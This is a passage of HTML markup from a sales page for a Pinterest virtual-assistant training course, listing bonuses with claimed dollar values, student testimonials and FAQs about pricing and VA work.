class="elementor-widget-wrap"> <div class="elementor-element elementor-element-17ed80b elementor-widget elementor-widget-heading" data-id="17ed80b" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">👇 Bonuses Breakdown 👇</h2> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-271f424 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="271f424" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-4bb5014 elementor-column elementor-col-100 elementor-top-column" data-id="4bb5014" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-7248c63 elementor-widget elementor-widget-heading" data-id="7248c63" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Promoted Pins Training ($199 value + a new skill set you can monetize = priceless!)</h2> </div> </div> <div class="elementor-element elementor-element-26fa240 elementor-widget elementor-widget-text-editor" data-id="26fa240" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p style="text-align: left;"><span style="color: inherit; font-family: inherit; font-size: inherit; font-weight: inherit; text-align: left;">Due to popular demand by clients and students alike, we are happy to announce we have added Promoted Pins training to our program!</span></p><p>After working directly with Pinterest Ads Managers for the past several months (on various campaigns), we’re offering this additional service you can offer to clients.</p><p>Learn how to set up Promoted Pins for your client and how to pick the right campaign for them.</p><p>We’ll also cover how to measure and gauge results, how to report your findings to your client and how to make adjustments as needed.</p><p>Clients don’t need a huge budget to get started with Promoted Pins – ad campaigns can be run with a small ad spend budget (like $5/day!).</p><p><strong>Not sure what to charge for this service?</strong> No worries! We’ll share how much to charge for your time, expertise and skill set!</p></div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-7683d89 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="7683d89" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-cef98f4 elementor-column elementor-col-100 elementor-top-column" data-id="cef98f4" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-c00a0ef elementor-widget elementor-widget-heading" data-id="c00a0ef" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">60 Days of Pinterest Post Community Membership ($99 value)</h2> </div> </div> <div class="elementor-element elementor-element-186ac42 elementor-widget elementor-widget-text-editor" data-id="186ac42" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p>There are endless benefits to our private community, which is currently housed on Facebook.</p><p>Your initial investment includes 60 days of access to our Pinterest Post Community. After 60 days, membership is optional. Renewal is presently $99 every 60 days – you can leave the group at any time (no tricky cancellation policy!).</p><p>We have found that students that access this group regularly have the most long-term success. #fact</p><p><strong>Why?</strong> They benefit from our distribution of unique client leads, bonus live trainings, weekly office hours, a network of their peers, built in accountability, bonus resources and group moderation to help guide you.</p><p>Our private community promotes positivity, encouragement <em>and</em> friendship – <strong>not competition.</strong></p></div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-5443e73 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="5443e73" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-81705ae elementor-column elementor-col-100 elementor-top-column" data-id="81705ae" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-58b6771 elementor-widget elementor-widget-heading" data-id="58b6771" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">6 Live Bonus Trainings ($3,600 value ← #truth)</h2> </div> </div> <div class="elementor-element elementor-element-2634fae elementor-widget elementor-widget-text-editor" data-id="2634fae" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p>Join Kristin and Gina LIVE as we walk you through the course material and answer your most pressing questions.</p><p>Previous live bonus trainings have included client pitch reviews, pin design feedback and ‘hire me pages’ critiques. Yes, we provide 2-on-1 feedback, so you can sharpen your skills and land more clients!</p></div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-9e91257 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="9e91257" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-e575cef elementor-column elementor-col-100 elementor-top-column" data-id="e575cef" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-3081549 elementor-widget elementor-widget-heading" data-id="3081549" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Pinterest Parties ($600/wk value ← #truth)</h2> </div> </div> <div class="elementor-element elementor-element-0da839b elementor-widget elementor-widget-text-editor" data-id="0da839b" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p>Every week during office hours, Kristin and Gina can be found inside the Pinterest Post Community answering your specific questions via Facebook Live.</p><p>If you have searched the course, the group archives and can’t find an answer from the community, leave your question in our weekly Q+A thread and we’ll make sure to personally answer it. </p><p>Kristin and Gina <i>each</i> regularly charge $250-$500 for a 30-60 minute consultation, so this is hands down the best way to ask your questions!</p></div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-8a6b322 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="8a6b322" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-f7b1f48 elementor-column elementor-col-100 elementor-top-column" data-id="f7b1f48" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-1c6ef6c elementor-widget elementor-widget-heading" data-id="1c6ef6c" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Client Leads ($250-$600 per client lead per month recurring revenue – #unlimitedpotential!)</h2> </div> </div> <div class="elementor-element elementor-element-736259e elementor-widget elementor-widget-text-editor" data-id="736259e" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p>Bloggers, brands and business owners (the 3 B’s!) are exclusively seeking out our students/alumni, which can only be found inside the Pinterest Post Community.</p><p>Our amazing client leads have various budgets and hire all different levels of Pinterest VAs – ranging from brand spanking new to advanced, depending on their needs/budget.</p><p>Every time we add a new lead into the Pinterest Post Community, members gain access to their official lead form and are encouraged to apply!</p></div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-3f62f85 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="3f62f85" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-c29d1ba elementor-column elementor-col-100 elementor-top-column" data-id="c29d1ba" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-7843150 elementor-widget elementor-widget-heading" data-id="7843150" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">60 Days of Tailwind for FREE! ($30 value)</h2> </div> </div> <div class="elementor-element elementor-element-497fb8a elementor-widget elementor-widget-text-editor" data-id="497fb8a" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p>Tailwind is our favorite scheduling tool (that we personally use!) and recommend.</p><p><strong>Better yet?</strong> Tailwind is an official partner with Pinterest when it comes to scheduling tools.</p><p><strong>Even better?</strong> Kristin is a Tailwind ambassador and works directly with the Tailwind team as they release new features.</p><p>For example, she was the first user to beta test SmartLoop and provide feedback for nearly a year before it was offered to the public. SmartLoop is just one of our favorite Tailwind features (when used correctly). 😜</p></div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-8c9f184 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="8c9f184" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-2772869 elementor-column elementor-col-100 elementor-top-column" data-id="2772869" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-5bc94fe elementor-widget elementor-widget-heading" data-id="5bc94fe" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Client Onboarding Workbook ($99 value) </h2> </div> </div> <div class="elementor-element elementor-element-78901a0 elementor-widget elementor-widget-text-editor" data-id="78901a0" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p><span style="color: inherit; font-family: inherit; font-size: inherit; font-weight: inherit;">Client&#8217;s value a &#8220;take charge&#8221; mentality and will have mad respect for you taking control and onboarding them as your new client.</span></p><p>Our workbook makes this process turn-key and positions you as the expert. Use it with each new client to look polished, professional and on top of your game!</p></div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-fc4c8b0 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="fc4c8b0" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-64b5c9a elementor-column elementor-col-100 elementor-top-column" data-id="64b5c9a" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-b1fa8b9 elementor-widget elementor-widget-heading" data-id="b1fa8b9" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Client Onboarding Workbook: Promoted Pins ($99 value)</h2> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-404d090 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="404d090" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-4d4e4b0 elementor-column elementor-col-100 elementor-top-column" data-id="4d4e4b0" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-74d510f elementor-widget elementor-widget-text-editor" data-id="74d510f" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p>In addition to our new Promoted Pins training, you&#8217;ll also receive a client onboarding workbook that you can use with every new client who wants to run promoted pin campaigns. </p><p>The workbook will walk you through step-by-step how to work with your clients – again placing you in the driver&#8217;s seat and proving your value to your clients!</p></div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-2c3212a elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="2c3212a" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-1105b27 elementor-column elementor-col-100 elementor-top-column" data-id="1105b27" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-bc68590 elementor-widget elementor-widget-heading" data-id="bc68590" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Client Monthly Analytics Report and Template ($99 value)</h2> </div> </div> <div class="elementor-element elementor-element-0b8a674 elementor-widget elementor-widget-text-editor" data-id="0b8a674" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p>Metrics are important to clients! They <em>are</em> looking for specific results afterall.</p><p>Confidently deliver monthly reporting to your clients with our customizable template report and graphic forms. Again, we try to make things turn-key for ya!</p></div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-aade4fb elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="aade4fb" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-5f4db91 elementor-column elementor-col-100 elementor-top-column" data-id="5f4db91" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-ca8d287 elementor-widget elementor-widget-heading" data-id="ca8d287" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Lifetime Access to the Program + FREE Updates to the Material (#totallypriceless!)</h2> </div> </div> <div class="elementor-element elementor-element-0e71d33 elementor-widget elementor-widget-text-editor" data-id="0e71d33" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p><span style="color: inherit; font-family: inherit; font-size: inherit; font-weight: inherit;">We regularly update the course material with new lessons and videos as Pinterest, Tailwind or any other platform that we use makes updates.</span></p><p>We know how important it is to work with a client and be up-to-date on all things Pinterest, so we’ve got you covered. </p><p>Every time we make a change to the course, we&#8217;ll let you know via email! 💌</p></div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-7ad4b57 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="7ad4b57" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-5364809 elementor-column elementor-col-100 elementor-top-column" data-id="5364809" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-10fbf67 elementor-widget elementor-widget-heading" data-id="10fbf67" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Real students, real results!</h2> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-ac412ce elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="ac412ce" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-2ef9585 elementor-column elementor-col-100 elementor-top-column" data-id="2ef9585" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-6920b7d elementor-testimonial--skin-bubble elementor-testimonial--layout-image_above elementor-testimonial--align-center elementor-arrows-yes elementor-pagination-type-bullets elementor-widget elementor-widget-testimonial-carousel" data-id="6920b7d" data-element_type="widget" data-settings="{&quot;show_arrows&quot;:&quot;yes&quot;,&quot;pagination&quot;:&quot;bullets&quot;,&quot;speed&quot;:500,&quot;autoplay&quot;:&quot;yes&quot;,&quot;autoplay_speed&quot;:5000,&quot;loop&quot;:&quot;yes&quot;,&quot;pause_on_interaction&quot;:&quot;yes&quot;,&quot;space_between&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:10,&quot;sizes&quot;:[]},&quot;space_between_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:10,&quot;sizes&quot;:[]},&quot;space_between_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:10,&quot;sizes&quot;:[]}}" data-widget_type="testimonial-carousel.default"> <div class="elementor-widget-container"> <div class="elementor-swiper"> <div class="elementor-main-swiper swiper-container"> <div class="swiper-wrapper"> <div class="swiper-slide"> <div class="elementor-testimonial"> <div class="elementor-testimonial__content"> <div class="elementor-testimonial__text"> "I turned in my resignation to my job today – I can officially say I’m a full-time PVA!📌 I was an ultrasound tech, so I made decent money to begin with. If I can do it, you can too!" </div> </div> <div class="elementor-testimonial__footer"> <div class="elementor-testimonial__image"> <img src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/IMG_0164-e1486261087401.jpg" alt="Victoria Sharp"> </div> <cite class="elementor-testimonial__cite"><span class="elementor-testimonial__name">Victoria Sharp</span><span class="elementor-testimonial__title">PVA Alumni</span></cite> </div> </div> </div> <div class="swiper-slide"> <div class="elementor-testimonial"> <div class="elementor-testimonial__content"> <div class="elementor-testimonial__text"> "Just wanted to let you know that I landed my FIRST client – thanks to everything you've taught me! He's AMAZING – so friendly and absolutely excited about everything! Very hands off and wants me to just run with it all. He gave a HUGE compliment and said that, "I spoke to many PVAs and they were ALL so talented! So many great options for us!" I'm just so grateful he chose me!" </div> </div> <div class="elementor-testimonial__footer"> <div class="elementor-testimonial__image"> <img src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/2019-04-11.jpg" alt="Courtney Stich"> </div> <cite class="elementor-testimonial__cite"><span class="elementor-testimonial__name">Courtney Stich</span><span class="elementor-testimonial__title">PVA Alumni</span></cite> </div> </div> </div> <div class="swiper-slide"> <div class="elementor-testimonial"> <div class="elementor-testimonial__content"> <div class="elementor-testimonial__text"> "I secured FOUR monthly clients and currently have two invoices out for people who have confirmed they're ready to get started – that's $1,350/m in less than 90 days! I still work full-time, so I'm considering hiring help to bring on more clients/replace my income!" </div> </div> <div class="elementor-testimonial__footer"> <div class="elementor-testimonial__image"> <img src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Screen-Shot-2019-04-12-at-1.04.00-PM.png" alt="Margaret Birch"> </div> <cite class="elementor-testimonial__cite"><span class="elementor-testimonial__name">Margaret Birch</span><span class="elementor-testimonial__title">PVA Alumni</span></cite> </div> </div> </div> <div class="swiper-slide"> <div class="elementor-testimonial"> <div class="elementor-testimonial__content"> <div class="elementor-testimonial__text"> "I scored TWO dream clients last week! 🎉 Sending pitches out every single day for the last week has made ALLLLL of the difference." </div> </div> <div class="elementor-testimonial__footer"> <div class="elementor-testimonial__image"> <img src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Screen-Shot-2019-04-12-at-12.51.03-PM.png" alt="Megan Haskin"> </div> <cite class="elementor-testimonial__cite"><span class="elementor-testimonial__name">Megan Haskin</span><span class="elementor-testimonial__title">PVA Alumni</span></cite> </div> </div> </div> <div class="swiper-slide"> <div class="elementor-testimonial"> <div class="elementor-testimonial__content"> <div class="elementor-testimonial__text"> “I was struggling to find a "work from home business" that wasn't a scam. This program was affordable and after just 2 months, I not only made my initial investment back, but I was bringing in a regular income. 8 months later, I’m earning more than my disability payments every month and feel like I am a contributing member of society again!” </div> </div> <div class="elementor-testimonial__footer"> <div class="elementor-testimonial__image"> <img src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Screen-Shot-2019-04-16-at-2.37.14-PM.png" alt="Kellie Evetts"> </div> <cite class="elementor-testimonial__cite"><span class="elementor-testimonial__name">Kellie Evetts</span><span class="elementor-testimonial__title">PVA Alumni</span></cite> </div> </div> </div> <div class="swiper-slide"> <div class="elementor-testimonial"> <div class="elementor-testimonial__content"> <div class="elementor-testimonial__text"> "My client just hit 2M viewers today! No Tribes, no group boards – all organic. We just hit the one year mark this month!" </div> </div> <div class="elementor-testimonial__footer"> <div class="elementor-testimonial__image"> <img src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/21762216_143446372931237_6601469024738440831_n.jpg" alt="Amy Ford"> </div> <cite class="elementor-testimonial__cite"><span class="elementor-testimonial__name">Amy Ford</span><span class="elementor-testimonial__title">PVA Alumni</span></cite> </div> </div> </div> <div class="swiper-slide"> <div class="elementor-testimonial"> <div class="elementor-testimonial__content"> <div class="elementor-testimonial__text"> "I just checked my email and have heard back from a pitch I sent – I just landed my first client! And it's just in time for my 'land my first client by Christmas' deadline! 🎁👊🎉" </div> </div> <div class="elementor-testimonial__footer"> <div class="elementor-testimonial__image"> <img src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Sarah-Cooke.jpg" alt="Sarah Cooke"> </div> <cite class="elementor-testimonial__cite"><span class="elementor-testimonial__name">Sarah Cooke</span><span class="elementor-testimonial__title">PVA Alumni</span></cite> </div> </div> </div> <div class="swiper-slide"> <div class="elementor-testimonial"> <div class="elementor-testimonial__content"> <div class="elementor-testimonial__text"> "My calendar pinged me that today is my 60-day income goal – I'm happy to say that not only did I surpass it, but I also paid back my investment in this program!" </div> </div> <div class="elementor-testimonial__footer"> <div class="elementor-testimonial__image"> <img src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Screen-Shot-2019-04-12-at-1.01.17-PM.png" alt="Stephanie Joseph"> </div> <cite class="elementor-testimonial__cite"><span class="elementor-testimonial__name">Stephanie Joseph</span><span class="elementor-testimonial__title">PVA Alumni</span></cite> </div> </div> </div> <div class="swiper-slide"> <div class="elementor-testimonial"> <div class="elementor-testimonial__content"> <div class="elementor-testimonial__text"> "I've pitched 10 leads from the Pinterest Post Community and have landed FOUR of them! Thanks so much!!" </div> </div> <div class="elementor-testimonial__footer"> <div class="elementor-testimonial__image"> <img src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Screen-Shot-2019-04-12-at-1.14.53-PM.png" alt="Sierra Schmidt"> </div> <cite class="elementor-testimonial__cite"><span class="elementor-testimonial__name">Sierra Schmidt</span><span class="elementor-testimonial__title">PVA Alumni</span></cite> </div> </div> </div> </div> <div class="swiper-pagination"></div> <div class="elementor-swiper-button elementor-swiper-button-prev"> <i class="eicon-chevron-left" aria-hidden="true"></i> <span class="elementor-screen-only">Previous</span> </div> <div class="elementor-swiper-button elementor-swiper-button-next"> <i class="eicon-chevron-right" aria-hidden="true"></i> <span class="elementor-screen-only">Next</span> </div> </div> </div> </div> </div> <div class="elementor-element elementor-element-bf643f6 elementor-widget elementor-widget-divider" data-id="bf643f6" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-8757ae8 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="8757ae8" data-element_type="section" data-settings="{&quot;stretch_section&quot;:&quot;section-stretched&quot;,&quot;background_background&quot;:&quot;classic&quot;}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-b96a375 elementor-column elementor-col-100 elementor-top-column" data-id="b96a375" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-2a69302 elementor-widget elementor-widget-heading" data-id="2a69302" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">FAQs</h2> </div> </div> <div class="elementor-element elementor-element-5a7d519 elementor-widget elementor-widget-divider" data-id="5a7d519" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> <div class="elementor-element elementor-element-b245f38 elementor-widget elementor-widget-accordion" data-id="b245f38" data-element_type="widget" data-widget_type="accordion.default"> <div class="elementor-widget-container"> <div class="elementor-accordion" role="tablist"> <div class="elementor-accordion-item"> <div id="elementor-tab-title-1861" class="elementor-tab-title" data-tab="1" role="tab" aria-controls="elementor-tab-content-1861"> <span class="elementor-accordion-icon elementor-accordion-icon-right" aria-hidden="true"> <i class="elementor-accordion-icon-closed fa fa-minus-circle"></i> <i class="elementor-accordion-icon-opened fa fa-minus"></i> </span> <a href="">How much does it cost to enroll in the program?</a> </div> <div id="elementor-tab-content-1861" class="elementor-tab-content elementor-clearfix" data-tab="1" role="tabpanel" aria-labelledby="elementor-tab-title-1861"><p>At our recent launch in Spring 2019, the program cost $799. Students could pay in full and save $154, or select a 2-month payment plan for $479 per month.</p><p>We have not announced pricing for our next public launch, which will be sometime in Fall 2019.</p></div> </div> <div class="elementor-accordion-item"> <div id="elementor-tab-title-1862" class="elementor-tab-title" data-tab="2" role="tab" aria-controls="elementor-tab-content-1862"> <span class="elementor-accordion-icon elementor-accordion-icon-right" aria-hidden="true"> <i class="elementor-accordion-icon-closed fa fa-minus-circle"></i> <i class="elementor-accordion-icon-opened fa fa-minus"></i> </span> <a href="">I’m almost too embarrassed to ask, but WHAT exactly is a VA?</a> </div> <div id="elementor-tab-content-1862" class="elementor-tab-content elementor-clearfix" data-tab="2" role="tabpanel" aria-labelledby="elementor-tab-title-1862"><p>Don’t be embarrassed!</p><p>VA stands for virtual assistant and basically means that you’re helping someone out from afar. I.e. you have a service to offer, they are in need of your service and you make a deal to trade time (or task) for pay.</p><p>There are TONS of services that can fall under the VA or virtual assistant umbrella – Pinterest is just one of them! Others include email management, blog management, graphic creation, bookkeeping… the list goes on!</p></div> </div> <div class="elementor-accordion-item"> <div id="elementor-tab-title-1863" class="elementor-tab-title" data-tab="3" role="tab" aria-controls="elementor-tab-content-1863"> <span class="elementor-accordion-icon elementor-accordion-icon-right" aria-hidden="true"> <i class="elementor-accordion-icon-closed fa fa-minus-circle"></i> <i class="elementor-accordion-icon-opened fa fa-minus"></i> </span> <a href="">What if I’m really new to VA work?</a> </div> <div id="elementor-tab-content-1863" class="elementor-tab-content elementor-clearfix" data-tab="3" role="tabpanel" aria-labelledby="elementor-tab-title-1863"><p>You don’t have to have much experience to get started as a virtual assistant, but you do need to be willing to learn a new skill, be proactive and ready to put in the work!</p><p><em>Become a Pinterest VA TODAY!</em> is a great fit for those that already use Pinterest for fun! The course will teach you what you need to know to specialize as a Pinterest virtual assistant, including technical training, what services to offer, how much to charge, how to find clients and more!</p><p>The technical training not only covers Pinterest, but also Tailwind (the scheduling tool we recommend) and Canva (the free graphic design tool we love and use daily!).</p><p>In addition to our templates and worksheets, you’ll also have access to the ‘Client Onboarding’ workbook that will walk you step-by-step through getting started working with your first client!</p></div> </div> <div class="elementor-accordion-item"> <div id="elementor-tab-title-1864" class="elementor-tab-title" data-tab="4" role="tab" aria-controls="elementor-tab-content-1864"> <span class="elementor-accordion-icon elementor-accordion-icon-right" aria-hidden="true"> <i class="elementor-accordion-icon-closed fa fa-minus-circle"></i> <i class="elementor-accordion-icon-opened fa fa-minus"></i> </span> <a href="">Can I live anywhere and do this?</a> </div> <div id="elementor-tab-content-1864" class="elementor-tab-content elementor-clearfix" data-tab="4" role="tabpanel" aria-labelledby="elementor-tab-title-1864"><p>As a Pinterest virtual assistant, you can live anywhere, work from anywhere and have clients from anywhere!</p><p>Many of our students live in countries all over the world and work with clients in the United States <em>and</em> abroad. As a Pinterest VA, you have the opportunity to work with brands, bloggers or businesses all over the world!*</p><p>In addition, you can also choose your own schedule. Because Pinterest<strong> isn’t</strong> a social media site, there is no pressure to quickly respond to Facebook alerts or Twitter messages. This allows you to work at a time that is convenient for you!</p><p><em>*If you&#8217;re looking to work with US-based clients, you&#8217;ll typically need an excellent command of the English language – both verbally and in written communication.</em></p></div> </div> <div class="elementor-accordion-item"> <div id="elementor-tab-title-1865" class="elementor-tab-title" data-tab="5" role="tab" aria-controls="elementor-tab-content-1865"> <span class="elementor-accordion-icon elementor-accordion-icon-right" aria-hidden="true"> <i class="elementor-accordion-icon-closed fa fa-minus-circle"></i> <i class="elementor-accordion-icon-opened fa fa-minus"></i> </span> <a href="">I already have a couple of VA clients – will I benefit from this course?</a> </div> <div id="elementor-tab-content-1865" class="elementor-tab-content elementor-clearfix" data-tab="5" role="tabpanel" aria-labelledby="elementor-tab-title-1865"><p>Absolutely!</p><p>Other students have started from a similar place in their journey and the course has helped them to level-up their PVA biz. We’ve also heard that they’ve learned to think of their clients, businesses and potential opportunities in a completely new way!</p><p>Maybe you’ll learn to offer new Pinterest-related services. Or maybe you’ll reconfigure the ones you’re already offering.</p><p>If you want to grow your clientele and you’re not getting results with what you&#8217;re currently doing, it probably makes sense to try something different – don’t you think?</p></div> </div> <div class="elementor-accordion-item"> <div id="elementor-tab-title-1866" class="elementor-tab-title" data-tab="6" role="tab" aria-controls="elementor-tab-content-1866"> <span class="elementor-accordion-icon elementor-accordion-icon-right" aria-hidden="true"> <i class="elementor-accordion-icon-closed fa fa-minus-circle"></i> <i class="elementor-accordion-icon-opened fa fa-minus"></i> </span> <a href="">Is there really a market for Pinterest services? How does it differ from other platforms?</a> </div> <div id="elementor-tab-content-1866" class="elementor-tab-content elementor-clearfix" data-tab="6" role="tabpanel" aria-labelledby="elementor-tab-title-1866"><p>Don’t think of Pinterest as a social media platform!</p><p>It’s more of a search engine that displays specific search results. It&#8217;s where people go to shop!</p><p>This makes Pinterest really unique compared to platforms such as Twitter and Facebook.</p><p>For this reason alone, businesses are specifically seeking out VAs who specialize in Pinterest. This course will definitely give you an edge over general social media VAs!</p></div> </div> <div class="elementor-accordion-item"> <div id="elementor-tab-title-1867" class="elementor-tab-title" data-tab="7" role="tab" aria-controls="elementor-tab-content-1867"> <span class="elementor-accordion-icon elementor-accordion-icon-right" aria-hidden="true"> <i class="elementor-accordion-icon-closed fa fa-minus-circle"></i> <i class="elementor-accordion-icon-opened fa fa-minus"></i> </span> <a href="">How long do I have access to the course and how long will it take to complete the material?</a> </div> <div id="elementor-tab-content-1867" class="elementor-tab-content elementor-clearfix" 